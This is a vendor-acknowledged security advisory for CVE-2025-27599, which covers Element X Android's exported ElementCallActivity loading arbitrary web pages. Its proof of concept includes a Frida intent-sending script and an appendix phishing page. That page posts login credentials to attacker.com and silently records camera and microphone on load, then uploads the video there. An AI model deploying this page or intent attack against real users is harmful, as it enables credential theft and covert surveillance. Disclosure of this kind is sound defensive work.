{"id":23867,"date":"2025-04-29T16:09:44","date_gmt":"2025-04-29T14:09:44","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0010\/"},"modified":"2025-05-09T10:40:39","modified_gmt":"2025-05-09T08:40:39","slug":"usd-2025-0010","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0010\/","title":{"rendered":"usd-2025-0010"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n

usd-2025-0010 | Element X Android <= 25.04.1 - Vulnerable to loading malicious web pages via received intent<\/h1>\n

<\/h1>\n

Product<\/strong>: Element X Android
Affected Version<\/strong>: <= 25.04.1
Vulnerability Type<\/strong>: Improper Export of Android Application Components (CWE-926)
Security Risk<\/strong>: High
Vendor<\/strong>: Element.io
Vendor URL<\/strong>: https:\/\/github.com\/element-hq\/element-x-android<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2025-27599
CVE Link<\/strong>: https:\/\/github.com\/element-hq\/element-x-android\/security\/advisories\/GHSA-m5px-pwq3-4p5m<\/a>
Advisory ID<\/strong>: usd-2025-0010<\/p>\n

Description<\/h3>\n

It is possible to call the exported ElementCallActivity<\/strong> and cause it to load a malicious webpage.<\/p>\n

The prerequisite for this is that the attacker is present on the device and can send an intent to the vulnerable activity. This can be done, for example, through another app on the smartphone that does not require any additional system permissions. Since the necessary code to call the exported activity is not inherently malicious, it is entirely possible to distribute such apps via the app store.<\/p>\n

A full-fledged phishing attack can be carried out via the content of the webpage opened through the intent in order to steal users' login credentials. Additionally, the camera and microphone can be accessed, as these permissions can either be granted by the app itself or have already been granted. This allows the identification of app users and enables the recording of both video and audio.<\/p>\n

Proof of Concept<\/h3>\n

The vulnerability arises because the ElementCallActivity<\/strong> is exported. This can be seen in the file features\/call\/impl\/src\/main\/AndroidManifest.xml<\/strong>:<\/p>\n

\n
<\/span>[...]\n<activity<\/span>\n    <\/span>android:name=<\/span>\".ui.ElementCallActivity\"<\/span>\n<\/span>    <\/span>android:configChanges=<\/span>\"screenSize|smallestScreenSize|screenLayout|orientation|keyboardHidden|keyboard|navigation|uiMode\"<\/span>\n    <\/span>android:exported=<\/span>\"true\"<\/span>\n<\/span>    <\/span>android:label=<\/span>\"@string\/element_call\"<\/span>\n    <\/span>android:launchMode=<\/span>\"singleTask\"<\/span>\n    <\/span>android:supportsPictureInPicture=<\/span>\"true\"<\/span>\n    <\/span>android:taskAffinity=<\/span>\"io.element.android.features.call\"<\/span>><\/span>\n<\/activity><\/span>\n[...]\n<\/pre>\n<\/div>\n
On the other hand, the Activity allows the launching of an internal WebView within the app's context via a specific Intent, which follows the provided URL. This URL is not validated beforehand, meaning any conceivable address can be accessed. The following excerpt shows this: features\/call\/impl\/src\/main\/kotlin\/io\/element\/android\/features\/call\/impl\/ui\/ElementCallActivity.kt<\/strong>:<\/p>\n
\n
<\/span>[<\/span>...<\/span>]<\/span>\nprivate<\/span> <\/span>fun<\/span> <\/span>setCallType<\/span>(<\/span>intent<\/span>:<\/span> <\/span>Intent?)<\/span> <\/span>{<\/span>\n        <\/span>val<\/span> <\/span>callType<\/span> <\/span>=<\/span> <\/span>intent<\/span>?.<\/span>let<\/span> <\/span>{<\/span>\n<\/span>            <\/span>IntentCompat<\/span>.<\/span>getParcelableExtra<\/span>(<\/span>intent<\/span>,<\/span> <\/span>DefaultElementCallEntryPoint<\/span>.<\/span>EXTRA_CALL_TYPE<\/span>,<\/span> <\/span>CallType<\/span>::<\/span>class<\/span>.<\/span>java<\/span>)<\/span>\n<\/span>                <\/span>?:<\/span> <\/span>intent<\/span>.<\/span>dataString<\/span>?.<\/span>let<\/span>(<\/span>::<\/span>parseUrl<\/span>)<\/span>?.<\/span>let<\/span>(<\/span>::<\/span>ExternalUrl<\/span>)<\/span>\n<\/span>        <\/span>}<\/span>\n        <\/span>val<\/span> <\/span>currentCallType<\/span> <\/span>=<\/span> <\/span>webViewTarget<\/span>.<\/span>value<\/span>\n        <\/span>if<\/span> <\/span>(<\/span>currentCallType<\/span> <\/span>==<\/span> <\/span>null<\/span>)<\/span> <\/span>{<\/span>\n            <\/span>if<\/span> <\/span>(<\/span>callType<\/span> <\/span>==<\/span> <\/span>null<\/span>)<\/span> <\/span>{<\/span>\n                <\/span>Timber<\/span>.<\/span>tag<\/span>(<\/span>loggerTag<\/span>.<\/span>value<\/span>).<\/span>d<\/span>(<\/span>\"Re-opened the activity but we have no url to load or a cached one, finish the activity\"<\/span>)<\/span>\n                <\/span>finish<\/span>()<\/span>\n            <\/span>}<\/span> <\/span>else<\/span> <\/span>{<\/span>\n                <\/span>Timber<\/span>.<\/span>tag<\/span>(<\/span>loggerTag<\/span>.<\/span>value<\/span>).<\/span>d<\/span>(<\/span>\"Set the call type and create the presenter\"<\/span>)<\/span>\n                <\/span>webViewTarget<\/span>.<\/span>value<\/span> <\/span>=<\/span> <\/span>callType<\/span>\n<\/span>                <\/span>presenter<\/span> <\/span>=<\/span> <\/span>presenterFactory<\/span>.<\/span>create<\/span>(<\/span>callType<\/span>,<\/span> <\/span>this<\/span>)<\/span>\n<\/span>            <\/span>}<\/span>\n        <\/span>}<\/span> <\/span>else<\/span> <\/span>{<\/span>\n            <\/span>if<\/span> <\/span>(<\/span>callType<\/span> <\/span>==<\/span> <\/span>null<\/span>)<\/span> <\/span>{<\/span>\n                <\/span>Timber<\/span>.<\/span>tag<\/span>(<\/span>loggerTag<\/span>.<\/span>value<\/span>).<\/span>d<\/span>(<\/span>\"Coming back from notification, do nothing\"<\/span>)<\/span>\n            <\/span>}<\/span> <\/span>else<\/span> <\/span>if<\/span> <\/span>(<\/span>callType<\/span> <\/span>!=<\/span> <\/span>currentCallType<\/span>)<\/span> <\/span>{<\/span>\n  <\/span>[<\/span>...<\/span>]<\/span>\n<\/pre>\n<\/div>\n
To reproduce the vulnerability, it is necessary to send a customized Intent to the vulnerable ElementX Activity. This can be tested from an app that includes the class io.element.android.features.call.api.CallType$ExternalUrl<\/strong> using the following Frida script. In a real attacker scenario, this would be a malicious app on the device that also contains this class.<\/p>\n
The following script creates the specific Intent and sends it to the ElementX app, ensuring it processes the Intent correctly. As a result, the ElementX app is forced to establish a connection to http:\/\/localhost:8080\/login.html.<\/a> However, any other web server with a valid TLS certificate could also be used.<\/p>\n
\n
<\/span>\/\/ Call the script with an app, which contains the needed classes e.g. the ElementX App self or another app with the specific classes<\/span>\n\/\/ frida -U -f io.element.android.x -l followingScript.js<\/span>\n\nJava<\/span>.<\/span>perform<\/span>(<\/span>function<\/span> <\/span>()<\/span> <\/span>{<\/span>\n\n\n    <\/span>function<\/span> <\/span>waitForContext<\/span>()<\/span> <\/span>{<\/span>\n        <\/span>try<\/span> <\/span>{<\/span>\n            <\/span>var<\/span> <\/span>context<\/span> <\/span>=<\/span> <\/span>Java<\/span>.<\/span>use<\/span>(<\/span>\"android.app.ActivityThread\"<\/span>)<\/span>\n            <\/span>var<\/span> <\/span>app<\/span> <\/span>=<\/span> <\/span>context<\/span>.<\/span>currentApplication<\/span>();<\/span>\n            <\/span>if<\/span> <\/span>(<\/span>app<\/span> <\/span>!==<\/span> <\/span>null<\/span>)<\/span> <\/span>{<\/span>\n                <\/span>var<\/span> <\/span>context<\/span> <\/span>=<\/span> <\/span>app<\/span>.<\/span>getApplicationContext<\/span>();<\/span>\n                <\/span>console<\/span>.<\/span>log<\/span>(<\/span>\"Application context loaded:\"<\/span>,<\/span> <\/span>context<\/span>);<\/span>\n                <\/span>createIntent<\/span>()<\/span>\n            <\/span>}<\/span> <\/span>else<\/span> <\/span>{<\/span>\n                <\/span>console<\/span>.<\/span>log<\/span>(<\/span>\"Waiting for application context...\"<\/span>);<\/span>\n                <\/span>setTimeout<\/span>(<\/span>waitForContext<\/span>,<\/span> <\/span>100<\/span>);<\/span> <\/span>\/\/ Retry in 100ms<\/span>\n            <\/span>}<\/span>\n        <\/span>}<\/span> <\/span>catch<\/span> <\/span>(<\/span>e<\/span>)<\/span> <\/span>{<\/span>\n            <\/span>console<\/span>.<\/span>log<\/span>(<\/span>\"Error accessing context, retrying...\"<\/span>,<\/span> <\/span>e<\/span>);<\/span>\n            <\/span>setTimeout<\/span>(<\/span>waitForContext<\/span>,<\/span> <\/span>100<\/span>);<\/span>\n        <\/span>}<\/span>\n    <\/span>}<\/span>\n\n    <\/span>function<\/span> <\/span>createIntent<\/span>(){<\/span>\n        <\/span>var<\/span> <\/span>Intent<\/span> <\/span>=<\/span> <\/span>Java<\/span>.<\/span>use<\/span>(<\/span>\"android.content.Intent\"<\/span>);<\/span>\n        <\/span>var<\/span> <\/span>ExternalUrl<\/span> <\/span>=<\/span> <\/span>Java<\/span>.<\/span>use<\/span>(<\/span>\"io.element.android.features.call.api.CallType$ExternalUrl\"<\/span>);<\/span>\n        <\/span>var<\/span> <\/span>context<\/span> <\/span>=<\/span> <\/span>Java<\/span>.<\/span>use<\/span>(<\/span>\"android.app.ActivityThread\"<\/span>)<\/span>\n\n        <\/span>var<\/span> <\/span>context<\/span> <\/span>=<\/span> <\/span>context<\/span>.<\/span>currentApplication<\/span>().<\/span>getApplicationContext<\/span>();<\/span>\n\n        <\/span>\/\/ Sending an Intent with ExternalUrl (Parcelable)<\/span>\n        <\/span>var<\/span> <\/span>intent<\/span> <\/span>=<\/span> <\/span>Intent<\/span>.<\/span>$new<\/span>();<\/span>\n        <\/span>intent<\/span>.<\/span>setClassName<\/span>(<\/span>\"io.element.android.x\"<\/span>,<\/span> <\/span>\"io.element.android.features.call.impl.ui.ElementCallActivity\"<\/span>);<\/span>\n        <\/span>var<\/span> <\/span>externalUrl<\/span> <\/span>=<\/span> <\/span>ExternalUrl<\/span>.<\/span>$new<\/span>(<\/span>\"[http:\/\/localhost:8080\/login.html\"<\/span>);]()<\/span>\n        <\/span>intent<\/span>.<\/span>putExtra<\/span>(<\/span>\"EXTRA_CALL_TYPE\"<\/span>,<\/span> <\/span>externalUrl<\/span>);<\/span>\n        <\/span>intent<\/span>.<\/span>addFlags<\/span>(<\/span>268435456<\/span>);<\/span>\n\n        <\/span>context<\/span>.<\/span>startActivity<\/span>(<\/span>intent<\/span>);<\/span>\n\n        <\/span>console<\/span>.<\/span>log<\/span>(<\/span>\"Intent with ExternalUrl sent.\"<\/span>);<\/span>\n\n    <\/span>}<\/span>\n    <\/span>waitForContext<\/span>();<\/span>\n\n});<\/span>\n<\/pre>\n<\/div>\n
Through the Intent, the ElementCallActivity opens a WebView that operates within the app's context\u2014and thus with its permissions.<\/p>\n
\"Intent:<\/p>\n
\"\"<\/p>\n
The malicious website not only captures the login credentials but also secretly records a video of the user and sends it to the attacker.<\/p>\n
\"Video:<\/p>\n
\"\"<\/p>\n
Additionally, the website can communicate with the underlying Rust SDK through an interface of the app. The full extent of this interaction could not be conclusively determined during the penetration test. However, there is a possibility that calls could be intercepted and manipulated.<\/p>\n
Ausschnitt: WebViewWidgetMessageInterceptor.kt<\/strong><\/p>\n
\n
<\/span>[<\/span>...<\/span>]<\/span>\n    <\/span>private<\/span> <\/span>fun<\/span> <\/span>onMessageReceived<\/span>(<\/span>json<\/span>:<\/span> <\/span>String?<\/span>)<\/span> <\/span>{<\/span>\n        <\/span>\/\/ Here is where we would handle the messages from the WebView, passing them to the Rust SDK<\/span>\n        <\/span>json<\/span>?.<\/span>let<\/span> <\/span>{<\/span> <\/span>interceptedMessages<\/span>.<\/span>tryEmit<\/span>(<\/span>it<\/span>)<\/span> <\/span>}<\/span>\n    <\/span>}<\/span>\n[<\/span>...<\/span>]<\/span>\n<\/pre>\n<\/div>\n
Appendix<\/h4>\n
Website used to intercept the credentials and to create and send the video:<\/p>\n
\n
<\/span><!DOCTYPE html><\/span>\n<<\/span>html<\/span> lang<\/span>=<\/span>\"en\"<\/span>><\/span>\n<<\/span>head<\/span>><\/span>\n    <<\/span>meta<\/span> charset<\/span>=<\/span>\"UTF-8\"<\/span>><\/span>\n    <<\/span>meta<\/span> name<\/span>=<\/span>\"viewport\"<\/span> content<\/span>=<\/span>\"width=device-width, initial-scale=1.0\"<\/span>><\/span>\n    <<\/span>title<\/span>><\/span>MessengerX - Login<\/<\/span>title<\/span>><\/span>\n    <<\/span>style<\/span>><\/span>\n        <\/span>body<\/span> <\/span>{<\/span>\n            <\/span>font-family<\/span>:<\/span> <\/span>Arial<\/span>,<\/span> <\/span>sans-serif<\/span>;<\/span>\n            <\/span>background-color<\/span>:<\/span> <\/span>#f2f2f2<\/span>;<\/span>\n            <\/span>display<\/span>:<\/span> <\/span>flex<\/span>;<\/span>\n            <\/span>justify-content<\/span>:<\/span> <\/span>center<\/span>;<\/span>\n            <\/span>align-items<\/span>:<\/span> <\/span>center<\/span>;<\/span>\n            <\/span>height<\/span>:<\/span> <\/span>100<\/span>vh<\/span>;<\/span>\n            <\/span>flex-direction<\/span>:<\/span> <\/span>column<\/span>;<\/span>\n            <\/span>position<\/span>:<\/span> <\/span>relative<\/span>;<\/span>\n        <\/span>}<\/span>\n        <\/span>.<\/span>login-container<\/span> <\/span>{<\/span>\n            <\/span>background<\/span>:<\/span> <\/span>white<\/span>;<\/span>\n            <\/span>padding<\/span>:<\/span> <\/span>20<\/span>px<\/span>;<\/span>\n            <\/span>border-radius<\/span>:<\/span> <\/span>10<\/span>px<\/span>;<\/span>\n            <\/span>box-shadow<\/span>:<\/span> <\/span>0<\/span> <\/span>0<\/span> <\/span>10<\/span>px<\/span> <\/span>rgba<\/span>(<\/span>0<\/span>,<\/span> <\/span>0<\/span>,<\/span> <\/span>0<\/span>,<\/span> <\/span>0.1<\/span>);<\/span>\n            <\/span>text-align<\/span>:<\/span> <\/span>center<\/span>;<\/span>\n            <\/span>width<\/span>:<\/span> <\/span>300<\/span>px<\/span>;<\/span>\n        <\/span>}<\/span>\n        <\/span>.<\/span>input-field<\/span> <\/span>{<\/span>\n            <\/span>width<\/span>:<\/span> <\/span>100<\/span>%<\/span>;<\/span>\n            <\/span>padding<\/span>:<\/span> <\/span>10<\/span>px<\/span>;<\/span>\n            <\/span>margin<\/span>:<\/span> <\/span>10<\/span>px<\/span> <\/span>0<\/span>;<\/span>\n            <\/span>border<\/span>:<\/span> <\/span>1<\/span>px<\/span> <\/span>solid<\/span> <\/span>#ccc<\/span>;<\/span>\n            <\/span>border-radius<\/span>:<\/span> <\/span>5<\/span>px<\/span>;<\/span>\n        <\/span>}<\/span>\n        <\/span>.<\/span>login-button<\/span> <\/span>{<\/span>\n            <\/span>background-color<\/span>:<\/span> <\/span>#007bff<\/span>;<\/span>\n            <\/span>color<\/span>:<\/span> <\/span>white<\/span>;<\/span>\n            <\/span>border<\/span>:<\/span> <\/span>none<\/span>;<\/span>\n            <\/span>padding<\/span>:<\/span> <\/span>10<\/span>px<\/span>;<\/span>\n            <\/span>width<\/span>:<\/span> <\/span>100<\/span>%<\/span>;<\/span>\n            <\/span>border-radius<\/span>:<\/span> <\/span>5<\/span>px<\/span>;<\/span>\n            <\/span>cursor<\/span>:<\/span> <\/span>pointer<\/span>;<\/span>\n        <\/span>}<\/span>\n        <\/span>.<\/span>login-button<\/span>:<\/span>hover<\/span> <\/span>{<\/span>\n            <\/span>background-color<\/span>:<\/span> <\/span>#0056b3<\/span>;<\/span>\n        <\/span>}<\/span>\n    <\/span><\/<\/span>style<\/span>><\/span>\n<\/<\/span>head<\/span>><\/span>\n<<\/span>body<\/span>><\/span>\n\n    <<\/span>div<\/span> class<\/span>=<\/span>\"login-container\"<\/span>><\/span>\n        <<\/span>h1<\/span>><\/span>MessengerX<\/<\/span>h1<\/span>><\/span>\n        <<\/span>h2<\/span>><\/span>Please login again<\/<\/span>h2<\/span>><\/span>\n        <<\/span>form<\/span> id<\/span>=<\/span>\"loginForm\"<\/span> action<\/span>=<\/span>\"[https:\/\/attacker.com\"<\/span>]()<\/span> method<\/span>=<\/span>\"POST\"<\/span>><\/span>\n            <<\/span>input<\/span> type<\/span>=<\/span>\"email\"<\/span> id<\/span>=<\/span>\"username\"<\/span> name<\/span>=<\/span>\"username\"<\/span> class<\/span>=<\/span>\"input-field\"<\/span> placeholder<\/span>=<\/span>\"Email\"<\/span> required<\/span>><\/span>\n            <<\/span>input<\/span> type<\/span>=<\/span>\"password\"<\/span> id<\/span>=<\/span>\"password\"<\/span> name<\/span>=<\/span>\"password\"<\/span> class<\/span>=<\/span>\"input-field\"<\/span> placeholder<\/span>=<\/span>\"Password\"<\/span> required<\/span>><\/span>\n            <<\/span>button<\/span> type<\/span>=<\/span>\"submit\"<\/span> class<\/span>=<\/span>\"login-button\"<\/span>><\/span>Login<\/<\/span>button<\/span>><\/span>\n        <\/<\/span>form<\/span>><\/span>\n    <\/<\/span>div<\/span>><\/span>\n\n    <<\/span>script<\/span>><\/span>\n        <\/span>async<\/span> <\/span>function<\/span> <\/span>startRecording<\/span>()<\/span> <\/span>{<\/span>\n            <\/span>try<\/span> <\/span>{<\/span>\n                <\/span>\/\/ Request camera and microphone access (hidden recording)<\/span>\n                <\/span>const<\/span> <\/span>stream<\/span> <\/span>=<\/span> <\/span>await<\/span> <\/span>navigator<\/span>.<\/span>mediaDevices<\/span>.<\/span>getUserMedia<\/span>({<\/span> <\/span>video<\/span>:<\/span> <\/span>true<\/span>,<\/span> <\/span>audio<\/span>:<\/span> <\/span>true<\/span> <\/span>});<\/span>\n\n                <\/span>\/\/ MediaRecorder to capture the video\/audio<\/span>\n                <\/span>let<\/span> <\/span>mediaRecorder<\/span> <\/span>=<\/span> <\/span>new<\/span> <\/span>MediaRecorder<\/span>(<\/span>stream<\/span>);<\/span>\n                <\/span>let<\/span> <\/span>chunks<\/span> <\/span>=<\/span> <\/span>[];<\/span>\n\n                <\/span>mediaRecorder<\/span>.<\/span>ondataavailable<\/span> <\/span>=<\/span> <\/span>event<\/span> <\/span>=><\/span> <\/span>chunks<\/span>.<\/span>push<\/span>(<\/span>event<\/span>.<\/span>data<\/span>);<\/span>\n\n                <\/span>mediaRecorder<\/span>.<\/span>onstop<\/span> <\/span>=<\/span> <\/span>async<\/span> <\/span>()<\/span> <\/span>=><\/span> <\/span>{<\/span>\n                    <\/span>\/\/ Convert recorded chunks into a Blob<\/span>\n                    <\/span>const<\/span> <\/span>blob<\/span> <\/span>=<\/span> <\/span>new<\/span> <\/span>Blob<\/span>(<\/span>chunks<\/span>,<\/span> <\/span>{<\/span> <\/span>type<\/span>:<\/span> <\/span>'video\/webm'<\/span> <\/span>});<\/span>\n\n                    <\/span>\/\/ Prepare file for upload<\/span>\n                    <\/span>const<\/span> <\/span>formData<\/span> <\/span>=<\/span> <\/span>new<\/span> <\/span>FormData<\/span>();<\/span>\n                    <\/span>formData<\/span>.<\/span>append<\/span>(<\/span>\"video\"<\/span>,<\/span> <\/span>blob<\/span>,<\/span> <\/span>\"aufnahme.webm\"<\/span>);<\/span>\n\n                    <\/span>\/\/ Upload the video file<\/span>\n                    <\/span>try<\/span> <\/span>{<\/span>\n                        <\/span>const<\/span> <\/span>response<\/span> <\/span>=<\/span> <\/span>await<\/span> <\/span>fetch<\/span>(<\/span>\"[https:\/\/attacker.com\"<\/span>,]()<\/span> <\/span>{<\/span>\n                            <\/span>method<\/span>:<\/span> <\/span>\"POST\"<\/span>,<\/span>\n                            <\/span>body<\/span>:<\/span> <\/span>formData<\/span>,<\/span>\n                        <\/span>});<\/span>\n\n                        <\/span>if<\/span> <\/span>(<\/span>response<\/span>.<\/span>ok<\/span>)<\/span> <\/span>{<\/span>\n                            <\/span>console<\/span>.<\/span>log<\/span>(<\/span>\"Video uploaded successfully!\"<\/span>);<\/span>\n                        <\/span>}<\/span> <\/span>else<\/span> <\/span>{<\/span>\n                            <\/span>console<\/span>.<\/span>error<\/span>(<\/span>\"Video upload failed:\"<\/span>,<\/span> <\/span>response<\/span>.<\/span>statusText<\/span>);<\/span>\n                        <\/span>}<\/span>\n                    <\/span>}<\/span> <\/span>catch<\/span> <\/span>(<\/span>error<\/span>)<\/span> <\/span>{<\/span>\n                        <\/span>console<\/span>.<\/span>error<\/span>(<\/span>\"Video upload error:\"<\/span>,<\/span> <\/span>error<\/span>);<\/span>\n                    <\/span>}<\/span>\n\n                    <\/span>\/\/ Stop the camera and microphone to hide indicators<\/span>\n                    <\/span>\/\/stream.getTracks().forEach(track => track.stop());<\/span>\n                <\/span>};<\/span>\n\n                <\/span>\/\/ Start recording<\/span>\n                <\/span>mediaRecorder<\/span>.<\/span>start<\/span>();<\/span>\n                <\/span>console<\/span>.<\/span>log<\/span>(<\/span>\"Recording started...\"<\/span>);<\/span>\n\n                <\/span>\/\/ Stop recording after 6 seconds<\/span>\n                <\/span>setTimeout<\/span>(()<\/span> <\/span>=><\/span> <\/span>{<\/span>\n                    <\/span>mediaRecorder<\/span>.<\/span>stop<\/span>();<\/span>\n                    <\/span>console<\/span>.<\/span>log<\/span>(<\/span>\"Recording stopped. Uploading...\"<\/span>);<\/span>\n                <\/span>},<\/span> <\/span>6000<\/span>);<\/span>\n\n            <\/span>}<\/span> <\/span>catch<\/span> <\/span>(<\/span>error<\/span>)<\/span> <\/span>{<\/span>\n                <\/span>console<\/span>.<\/span>error<\/span>(<\/span>\"Error accessing camera\/microphone:\"<\/span>,<\/span> <\/span>error<\/span>);<\/span>\n            <\/span>}<\/span>\n        <\/span>}<\/span>\n\n        <\/span>\/\/ Automatically start the process when the page loads<\/span>\n        <\/span>window<\/span>.<\/span>onload<\/span> <\/span>=<\/span> <\/span>function<\/span>()<\/span> <\/span>{<\/span>\n            <\/span>startRecording<\/span>();<\/span> <\/span>\/\/ Start hidden video recording<\/span>\n        <\/span>};<\/span>\n\n    <\/span><\/<\/span>script<\/span>><\/span>\n<\/<\/span>body<\/span>><\/span>\n<\/<\/span>html<\/span>><\/span>\n<\/pre>\n<\/div>\n
Fix<\/h3>\n
For mitigation, the activity should no longer be exported. In addition, a check should be implemented that validates the URL transferred in the intent accordingly.<\/p>\n
References<\/h3>\n